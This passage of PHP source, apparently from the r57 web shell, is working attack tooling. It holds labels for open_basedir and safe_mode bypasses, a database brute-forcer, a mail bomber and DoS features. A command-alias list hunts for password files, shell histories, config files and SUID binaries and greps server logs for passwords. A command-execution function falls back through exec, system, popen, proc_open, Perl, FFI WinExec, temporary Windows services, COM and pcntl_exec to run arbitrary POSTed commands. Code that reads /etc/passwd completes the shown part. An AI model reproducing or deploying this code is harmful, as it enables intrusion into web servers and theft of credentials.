2678'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
2679
2680'eng_text128'=>'Modify/Access file (touch)',
2681
2682'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
2683
2684'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
2685
2686'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
2687
2688'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
2689
2690'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
2691
2692'eng_text134'=>'Database-bruteforce',
2693
2694'eng_text135'=>'Dictionary',
2695
2696'eng_text136'=>'Creating evil symlink',
2697
2698'eng_text137'=>'Useful',
2699
2700'eng_text138'=>'Dangerous',
2701
2702'eng_text139'=>'Mail Bomber',
2703
2704'eng_text140'=>'DoS',
2705
2706'eng_text141'=>'Danger! Web-daemon crash possible.',
2707
2708'eng_text142'=>'Downloaders',
2709
2710'eng_text143'=>'Temp: ',
2711
2712'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
2713
2714'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
2715
2716'eng_text146'=>'Max Interation',
2717
2718'eng_text147'=>'',
2719
2720'eng_text148'=>'',
2721
2722'eng_text149'=>'',
2723
2724'eng_text150'=>'',
2725
2726'eng_err0'=>'Error! Can\'t write in file ',
2727
2728'eng_err1'=>'Error! Can\'t read file ',
2729
2730'eng_err2'=>'Error! Can\'t create ',
2731
2732'eng_err3'=>'Error! Can\'t connect to ftp',
2733
2734'eng_err4'=>'Error! Can\'t login on ftp server',
2735
2736'eng_err5'=>'Error! Can\'t change dir on ftp',
2737
2738'eng_err6'=>'Error! Can\'t sent mail',
2739
2740'eng_err7'=>'Mail send',
2741
2742);
2743
2744/*
2745
2746?????? ??????
2747
2748????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
2749
2750?? ?????? ???? ????????? ??? ???????? ???????.
2751
2752*/
2753
2754$aliases=array(
2755
2756'----------------------------------locate'=>'',
2757
2758'locate httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2759
2760'locate vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2761
2762'locate proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2763
2764'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2765
2766'locate my.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate my.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2767
2768'locate admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2769
2770'locate cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2771
2772'locate conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2773
2774'locate config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2775
2776'locate config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2777
2778'locate config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2779
2780'locate config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2781
2782'locate config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2783
2784'locate .conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2785
2786'locate .pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2787
2788'locate .sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2789
2790'locate .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".htpasswd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2791
2792'locate .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".bash_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2793
2794'locate .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".mysql_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2795
2796'locate backup files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate backup >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2797
2798'locate dump files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate dump >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2799
2800'locate priv files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate priv >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2801
2802'----------------------------------tar'=>'',
2803
2804'tar -czvf all.tgz -T '.$tempdir.'grep.txt'=>'tar -czvf all.tgz -T '.$tempdir.'grep.txt',
2805
2806'----------------------------------1'=>'',
2807
2808'locate auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2809
2810'locate access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2811
2812'locate error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2813
2814'locate auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2815
2816'locate access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2817
2818'locate error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2819
2820'locate ".log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2821
2822'----------------------------------2'=>'',
2823
2824'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2825
2826'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2827
2828'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2829
2830'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2831
2832'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2833
2834'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2835
2836'----------------------------------find'=>'',
2837
2838'find suid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2839
2840'find suid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2841
2842'find sgid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2843
2844'find sgid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2845
2846'find all writable files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2847
2848'find all writable files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2849
2850'find all writable directories >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2851
2852'find all writable directories in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2853
2854'find all writable directories and files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2855
2856'find all writable directories and files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2857
2858'find all .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .htpasswd >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2859
2860'find all .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .bash_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2861
2862'find all .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .mysql_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2863
2864'find all .fetchmailrc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .fetchmailrc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2865
2866'find httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2867
2868'find vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2869
2870'find proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2871
2872'find admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2873
2874'find config* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "config*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2875
2876'find cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2877
2878'find conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2879
2880'find config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2881
2882'find config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2883
2884'find config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2885
2886'find config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2887
2888'find config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2889
2890'find *.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2891
2892'find *.pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2893
2894'find *.sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2895
2896'find *backup* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*backup*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2897
2898'find *dump* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*dump*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2899
2900'-----------------------------------'=>'',
2901
2902'find /var/ auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2903
2904'find /var/ access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2905
2906'find /var/ error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2907
2908'find /var/ auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2909
2910'find /var/ access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2911
2912'find /var/ error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2913
2914'find /var/ "*_log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2915
2916'find /var/ "*.log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2917
2918'----------------------------------------------------------------------------------------------------'=>'ls -la'
2919
2920);
2921
2922$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
2923
2924$table_up2 = " ::</div></b></font></td></tr><tr><td>";
2925
2926$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
2927
2928$table_end1 = "</td></tr>";
2929
2930$arrow = " <font face=Webdings color=gray>4</font>";
2931
2932$lb = "<font color=black>[</font>";
2933
2934$rb = "<font color=black>]</font>";
2935
2936$font = "<font face=Verdana size=-2>";
2937
2938$ts = "<table class=table1 width=100% align=center>";
2939
2940$te = "</table>";
2941
2942$fs = "<form name=form method=POST>";
2943
2944$fe = "</form>";
2945
2946
2947
2948if(isset($_GET['users']))
2949
2950 {
2951
2952 if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
2953
2954 else
2955
2956 {
2957
2958 echo '<center>';
2959
2960 foreach($users as $user) { echo $user."<br>"; }
2961
2962 echo '</center>';
2963
2964 }
2965
2966 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
2967
2968 }
2969
2970
2971
2972if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }
2973
2974if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
2975
2976$unix = 0;
2977
2978if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
2979
2980if(empty($dir))
2981
2982 {
2983
2984 $os = getenv('OS');
2985
2986 if(empty($os)){ $os = @php_uname(); }
2987
2988 if(empty($os)){ $os ="-"; $unix=1; }
2989
2990 else
2991
2992 {
2993
2994 if(@eregi("^win",$os)) { $unix = 0; }
2995
2996 else { $unix = 1; }
2997
2998 }
2999
3000 }
3001
3002
3003
3004if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
3005
3006 {
3007
3008 echo $head;
3009
3010 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
3011
3012 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
3013
3014 $sr->SearchText(0,0);
3015
3016 $res = $sr->GetResultFiles();
3017
3018 $found = $sr->GetMatchesCount();
3019
3020 $titles = $sr->GetTitles();
3021
3022 $r = "";
3023
3024 if($found > 0)
3025
3026 {
3027
3028 $r .= "<TABLE width=100%>";
3029
3030 foreach($res as $file=>$v)
3031
3032 {
3033
3034 $r .= "<TR>";
3035
3036 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
3037
3038 $r .= (!$unix)? str_replace("/","\\",$file) : $file;
3039
3040 $r .= "</b></font></ TD>";
3041
3042 $r .= "</TR>";
3043
3044 foreach($v as $a=>$b)
3045
3046 {
3047
3048 $r .= "<TR>";
3049
3050 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
3051
3052 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
3053
3054 $r .= "</TR>\n";
3055
3056 }
3057
3058 }
3059
3060 $r .= "</TABLE>";
3061
3062 echo $r;
3063
3064 }
3065
3066 else
3067
3068 {
3069
3070 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
3071
3072 }
3073
3074 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
3075
3076 die();
3077
3078 }
3079
3080
3081
3082/*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/
3083
3084if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;}
3085
3086$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
3087
3088if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
3089
3090
3091
3092function ws($i)
3093
3094{
3095
3096return @str_repeat(" ",$i);
3097
3098}
3099
3100
3101
3102function ex($cfe)
3103
3104{global $unix,$tempdir;
3105
3106 $res = '';
3107
3108 if (!empty($cfe))
3109
3110 {
3111
3112 if(@function_exists('exec'))
3113
3114 {
3115
3116 @exec($cfe,$res);
3117
3118 $res = join("\n",$res);
3119
3120 }
3121
3122 elseif(@function_exists('shell_exec'))
3123
3124 {
3125
3126 $res = @shell_exec($cfe);
3127
3128 }
3129
3130 elseif(@function_exists('system'))
3131
3132 {
3133
3134 @ob_start();
3135
3136 @system('$cfe');
3137
3138 $res = @ob_get_contents();
3139
3140 @ob_end_clean();
3141
3142 }
3143
3144 elseif(@function_exists('passthru'))
3145
3146 {
3147
3148 @ob_start();
3149
3150 @passthru($cfe);
3151
3152 $res = @ob_get_contents();
3153
3154 @ob_end_clean();
3155
3156 }
3157
3158 elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r")))
3159
3160 {
3161
3162 $res = "";
3163
3164 if(@function_exists('fread') && @function_exists('feof')){
3165
3166 while(!@feof($f)) { $res .= @fread($f,1024); }
3167
3168 }else if(@function_exists('fgets') && @function_exists('feof')){
3169
3170 while(!@feof($f)) { $res .= @fgets($f,1024); }
3171
3172 }
3173
3174 @pclose($f);
3175
3176 }
3177
3178 elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))
3179
3180 {
3181
3182 $res = "";
3183
3184 if(@function_exists('fread') && @function_exists('feof')){
3185
3186 while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}
3187
3188 }else if(@function_exists('fgets') && @function_exists('feof')){
3189
3190 while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}
3191
3192 }
3193
3194 @proc_close($f);
3195
3196 }
3197
3198 }else{$res = safe_ex($cfe);}
3199
3200 return htmlspecialchars($res);
3201
3202}
3203
3204
3205
3206
3207
3208function safe_ex($cfe)
3209
3210{global $unix,$tempdir;
3211
3212 $res = '';
3213
3214 if (!empty($cfe))
3215
3216 {
3217
3218 if(extension_loaded('perl')){
3219
3220 @ob_start();
3221
3222 $safeperl=new perl();
3223
3224 $safeperl->eval("system('$cfe')");
3225
3226 $res = @ob_get_contents();
3227
3228 @ob_end_clean();
3229
3230 }
3231
3232 elseif(!$unix && extension_loaded('ffi'))
3233
3234 {
3235
3236 $output=$tempdir.uniqid('NJ');
3237
3238 $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
3239
3240 if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >\"$output\"",0);}
3241
3242 else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >\"$output\"",0);}
3243
3244 while(!@file_exists($output))sleep(1);
3245
3246 $res=moreread($output);
3247
3248 @unlink($output);
3249
3250 }
3251
3252 elseif(!$unix && extension_loaded('win32service'))
3253
3254 {
3255
3256 $output=$tempdir.uniqid('NJ');
3257
3258 $n_ser=uniqid('NJ');
3259
3260 if(!@function_exists('escapeshellarg'))
3261
3262 {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c $cfe >\"$output\""));}
3263
3264 else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c ".@escapeshellarg($cfe)." >\"$output\""));}
3265
3266 @win32_start_service($n_ser);
3267
3268 @win32_stop_service($n_ser);
3269
3270 @win32_delete_service($n_ser);
3271
3272 while(!@file_exists($output))sleep(1);
3273
3274 $res=moreread($output);
3275
3276 @unlink($output);
3277
3278 }
3279
3280 elseif(!$unix && extension_loaded("win32std"))
3281
3282 {
3283
3284 $output=$tempdir.uniqid('NJ');
3285
3286 if(!@function_exists('escapeshellarg')){@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
3287
3288 else{@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
3289
3290 while(!@file_exists($output))sleep(1);
3291
3292 $res=moreread($output);
3293
3294 @unlink($output);
3295
3296 }
3297
3298 elseif(!$unix)
3299
3300 {
3301
3302 $output=$tempdir.uniqid('NJ');
3303
3304 $suntzu = new COM("WScript.Shell");
3305
3306 if(!@function_exists('escapeshellarg')){$suntzu->Run('c:\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
3307
3308 else{$suntzu->Run('c:\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
3309
3310 $res=moreread($output);
3311
3312 @unlink($output);
3313
3314 }
3315
3316 elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork'))
3317
3318 {
3319
3320 $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
3321
3322 $output=$tempdir.uniqid('pcntl');
3323
3324 $pid = @pcntl_fork();
3325
3326 if ($pid == -1) {
3327
3328 $res .= '[-] Could not children fork. Exit';
3329
3330 } else if ($pid) {
3331
3332 if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
3333
3334 else {$res .= '[-] Error. Command incorrect.';}
3335
3336 } else {
3337
3338 $cfe = array(" -e 'system(\"$cfe > $output\")'");
3339
3340 if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
3341
3342 if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
3343
3344 die();
3345
3346 }
3347
3348 $res=moreread($output);
3349
3350 @unlink($output);
3351
3352 }
3353
3354/* elseif(1)
3355
3356 {
3357
3358
3359
3360 }
3361
3362*/
3363
3364 }
3365
3366 return htmlspecialchars($res);
3367
3368}
3369
3370
3371
3372function get_users($filename)
3373
3374{
3375
3376 $users = $rows = array();
3377
3378 $rows=@explode("\n",moreread($filename));
3379
3380 if(!$rows[0]){$rows=@explode("\n",readzlib($filename));}
3381
3382 if(!$rows[0]) return 0;
3383
3384 foreach ($rows as $string)
3385
3386 {
3387
3388 $user = @explode(":",trim($string));
3389
3390 if(substr($string,0,1)!='#') array_push($users,$user[0]);
3391
3392 }
3393
3394 return $users;
3395
3396}
3397
3398function err($n,$txt='')
3399
3400{
3401
3402echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
3403
3404echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
3405
3406if(!empty($txt)) { echo " $txt"; }
3407
3408echo '</b></div></font></td></tr></table>';
3409
3410return null;
3411
3412}
3413
3414function perms($mode)
3415
3416{
3417
3418if (!$GLOBALS['unix']) return 0;
3419
3420if( $mode & 0x1000 ) { $type='p'; }
3421
3422else if( $mode & 0x2000 ) { $type='c'; }
3423
3424else if( $mode & 0x4000 ) { $type='d'; }
3425
3426else if( $mode & 0x6000 ) { $type='b'; }
3427
3428else if( $mode & 0x8000 ) { $type='-'; }
3429
3430else if( $mode & 0xA000 ) { $type='l'; }
3431
3432else if( $mode & 0xC000 ) { $type='s'; }
3433
3434else $type='u';
3435
3436$owner["read"] = ($mode & 00400) ? 'r' : '-';
3437
3438$owner["write"] = ($mode & 00200) ? 'w' : '-';
3439
3440$owner["execute"] = ($mode & 00100) ? 'x' : '-';
3441
3442$group["read"] = ($mode & 00040) ? 'r' : '-';
3443
3444$group["write"] = ($mode & 00020) ? 'w' : '-';
3445
3446$group["execute"] = ($mode & 00010) ? 'x' : '-';
3447
3448$world["read"] = ($mode & 00004) ? 'r' : '-';
3449
3450$world["write"] = ($mode & 00002) ? 'w' : '-';
3451
3452$world["execute"] = ($mode & 00001) ? 'x' : '-';
3453
3454if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
3455
3456if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
3457
3458if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
3459
3460$s=sprintf("%1s", $type);
3461
3462$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
3463
3464$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
3465
3466$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
3467
3468return trim($s);
3469
3470}
3471
3472function in($type,$name,$size,$value,$checked=0)
3473
3474{
3475
3476 $ret = "<input type=".$type." name=".$name." ";
3477
3478 if($size != 0) { $ret .= "size=".$size." "; }
3479
3480 $ret .= "value=\"".$value."\"";
3481
